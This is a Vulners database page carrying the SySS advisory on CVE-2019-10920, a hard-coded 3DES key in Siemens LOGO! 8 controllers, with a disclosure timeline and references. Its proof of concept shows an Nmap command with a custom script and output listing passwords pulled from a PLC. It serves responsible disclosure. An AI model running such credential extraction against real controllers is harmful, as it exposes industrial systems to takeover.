Vulners
Lucene search
Siemens LOGO! 8 Hard-Coded Cryptographic Key Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | The vulnerability of Siemens LOGO!8 BM programmable logic controller’s microprogramming software lies in the presence of pre-installed encryption keys, which allow attackers to decrypt the project data. | 14 Jun 201900:00 | – | bdu_fstec |
 | CVE-2019-10920 | 14 May 201919:54 | – | cve |
 | CVE-2019-10920 | 14 May 201919:54 | – | cvelist |
 | EUVD-2019-2634 | 7 Oct 202500:30 | – | euvd |
 | Siemens LOGO! 8 BM (Update A) | 14 May 201900:00 | – | ics |
 | Vulnerabilities fixed in Siemens vulnerabilities | 8 Dec 202000:00 | – | ncsc |
 | CVE-2019-10920 | 14 May 201920:29 | – | nvd |
 | Siemens LOGO! 8 Hard-Coded Cryptographic Key | 29 May 201900:00 | – | packetstorm |
 | Hardcoded credentials | 14 May 201920:29 | – | prion |
 | CVE-2019-10920 | 22 May 202510:24 | – | redhatcve |
10
Siemens LOGO! 8 Hard-Coded Cryptographic Key Vulnerability
Product: LOGO!
Manufacturer: Siemens
Affected Version(s): LOGO! 8 (all versions)
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-04-04
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)
Public Disclosure: 2019-05-29
CVE Reference: CVE-2019-10920
Authors of Advisory: Manuel Stotz, Matthias Deeg (SySS GmbH)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Siemens LOGO! is a programmable logic controller (PLC) for small
automation tasks.
The manufacturer describes the product as follows (see [1]):
"Simple installation, minimum wiring, user-friendly programming: You can
easily implement small automation projects with LOGO!, the intelligent
logic module from Siemens. The LOGO! Logic Module saves space in the
control cabinet, and lets you easily implement functions, such as
time-delay switches, time relays, counters and auxiliary relays. "
Due to the use of a hard-coded cryptographic key, an attacker can put
the integrity and confidentiality of encrypted data of all LOGO! 8 PLCs
using this key at risk, for instance decrypting network communication
during a man-in-the-middle attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
SySS GmbH found out that LOGO! PLCs use a static, hard-coded
cryptographic 3DES key for protecting sensitive information, like
network communication and configuration data.
For instance, this key can be found within the LOGO! Soft Comfort
software.
By knowing this static cryptographic 3DES key, an attacker can decrypt
all LOGO! data that is encrypted with this key and gain access to
sensitive data, for instance different configured passwords.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
SySS GmbH used the hard-coded cryptographic 3DES key in a software tool
(Nmap script) for extracting sensitive data such as configured passwords
as cleartext.
The following Nmap output exemplarily shows extracting password data
from a LOGO! 8 PLC:
$ nmap -p 10005 --script slig.nse 192.168.10.112
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-04 09:35 CEST
Nmap scan report for 192.168.10.112
Host is up (0.00044s latency).
PORT STATE SERVICE
10005/tcp open stel
| slig: Gathered Siemens LOGO!8 access details and passwords
| User: LSCUser
| Password: S3cret1
| Enabled: True
| User: AppUser
| Password: S3cret2
| Enabled: True
| User: WebUser
| Password: S3cret3
| Enabled: True
| User: TDUser
| Password: S3cret4
| Enabled: True
| Protection: Password
| Program password: SECRET
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
A successful attack against a LOGO! 8 extracting all configured
passwords is demonstrated in our SySS PoC video [5].
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
In the publicly released Siemens Security Advisory SSA-542701 [3],
the manufacturer Siemens recommends to apply a defense-in-depth concept,
including protection concept outlined in the system manual, as a
mitigation for reducing the risk of the described security issue.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2019-04-04: Vulnerability reported to manufacturer
2019-04-04: Manufacturer confirms receipt of security advisory and
asks for referenced Nmap script
2019-04-04: SySS provides PoC Nmap script
2019-05-14: Public release of Siemens Security Advisory SSA-542701
2019-05-29: Public release of SySS security advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for Siemens LOGO!
https://new.siemens.com/global/en/products/automation/systems/industrial/plc/logo.html
[2] SySS Security Advisory SYSS-2019-012
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-012.txt
[3] Siemens Security Advisory SSA-542701
https://cert-portal.siemens.com/productcert/pdf/ssa-542701.pdf
[4] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/
[5] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"
https://youtu.be/TpH4EABGYCs
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 May 2019 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 25
CVSS 3.17.5
EPSS0.00763